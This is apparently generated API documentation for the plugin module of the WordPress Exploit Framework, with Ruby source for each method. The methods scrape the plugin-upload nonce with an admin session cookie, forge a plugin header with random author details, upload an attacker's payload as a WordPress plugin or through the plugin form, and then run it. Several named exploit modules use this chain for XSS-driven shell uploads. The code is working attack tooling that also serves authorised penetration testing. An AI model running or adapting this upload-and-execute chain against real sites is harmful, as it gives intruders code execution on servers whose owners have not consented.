Module: Wpxf::WordPress::Plugin

Included in:
Exploit::AdminManagementXtendedXssShellUpload, Exploit::AdminShellUpload, Exploit::JobManagerReflectedXssShellUpload, Exploit::MdcPrivateMessageXssShellUpload, Exploit::ParticipantsDatabaseV1548ShellUpload, Exploit::PhotoAlbumPlusXssShellUpload, Exploit::PhotoGalleryShellUpload, Exploit::SuperSocializerShellUpload, Exploit::UltimateMemberShellUpload, Exploit::UserProShellUpload, Xss
Defined in:
lib/wpxf/wordpress/plugin.rb

Overview

Provides functionality required to interact with the plugin system.

Instance Method Summary collapse

Instance Method Details

#fetch_plugin_upload_nonce(cookie) ⇒ String?

Retrieve a valid nonce to use for plugin uploads.

Parameters:

  • cookie (String)

    a valid admin session cookie.

Returns:

  • (String, nil)

    the nonce, nil on error.



8
9
10
11
12
 
# File 'lib/wpxf/wordpress/plugin.rb', line 8

def fetch_plugin_upload_nonce(cookie)
  res = execute_get_request(url: wordpress_url_plugin_upload, cookie: cookie)
  return nil unless res&.code == 200
  res.body[/id="_wpnonce" name="_wpnonce" value="([a-z0-9]+)"/i, 1]
end

#generate_wordpress_plugin_header(plugin_name) ⇒ String

Generate a valid WordPress plugin header / base file.

Parameters:

  • plugin_name (String)

    the name of the plugin.

Returns:

  • (String)

    a PHP script with the appropriate meta data.



60
61
62
63
64
65
66
67
68
69
70
 
# File 'lib/wpxf/wordpress/plugin.rb', line 60

def generate_wordpress_plugin_header(plugin_name)
  ['<?php',
   '/**',
   "* Plugin Name: #{plugin_name}",
   "* Version: #{_generate_wordpress_plugin_version}",
   "* Author: #{Wpxf::Utility::Text.rand_alpha(10)}",
   "* Author URI: http://#{Wpxf::Utility::Text.rand_alpha(10)}.com",
   '* License: GPL2',
   '*/',
   '?>'].join("\n")
end

#upload_payload_as_plugin(name, payload_name, cookie) ⇒ Boolean

Create and upload a plugin that encapsulates the current payload.

Parameters:

  • name (String)

    the name of the plugin.

  • payload_name (String)

    the name the payload should use on the server.

  • cookie (String)

    a valid admin session cookie.

Returns:

  • (Boolean)

    true on success, false on error.



19
20
21
22
23
24
25
 
# File 'lib/wpxf/wordpress/plugin.rb', line 19

def upload_payload_as_plugin(name, payload_name, cookie)
  nonce = fetch_plugin_upload_nonce(cookie)
  return false if nonce.nil?

  res = _upload_plugin(name, payload_name, cookie, nonce)
  res&.code == 200 && res.body !~ /plugin installation failed/i
end

#upload_payload_as_plugin_and_execute(plugin_name, payload_name, cookie) ⇒ HttpResponse?

Upload and execute a payload as a plugin.

Parameters:

  • plugin_name (String)

    the name of the plugin.

  • payload_name (String)

    the name the payload should use on the server.

  • cookie (String)

    a valid admin session cookie.

Returns:



44
45
46
47
48
49
50
51
52
53
54
55
 
# File 'lib/wpxf/wordpress/plugin.rb', line 44

def upload_payload_as_plugin_and_execute(plugin_name, payload_name, cookie)
  uploaded_as_plugin = upload_payload_as_plugin(plugin_name, payload_name, cookie)

  unless uploaded_as_plugin
    unless upload_payload_using_plugin_form(payload_name, cookie)
      emit_error 'Failed to upload the payload'
      return nil
    end
  end

  _execute_payload_uploaded_as_plugin(uploaded_as_plugin ? plugin_name : nil, payload_name)
end

#upload_payload_using_plugin_form(payload_name, cookie) ⇒ Boolean

Upload the payload via the plugin form without packaging it in a ZIP file.

Parameters:

  • payload_name (String)

    the name the payload should use on the server.

  • cookie (String)

    a valid admin session cookie.

Returns:

  • (Boolean)

    true on success, false on error.



31
32
33
34
35
36
37
 
# File 'lib/wpxf/wordpress/plugin.rb', line 31

def upload_payload_using_plugin_form(payload_name, cookie)
  nonce = fetch_plugin_upload_nonce(cookie)
  return false if nonce.nil?

  res = _upload_plugin(nil, payload_name, cookie, nonce, false)
  res&.code == 200
end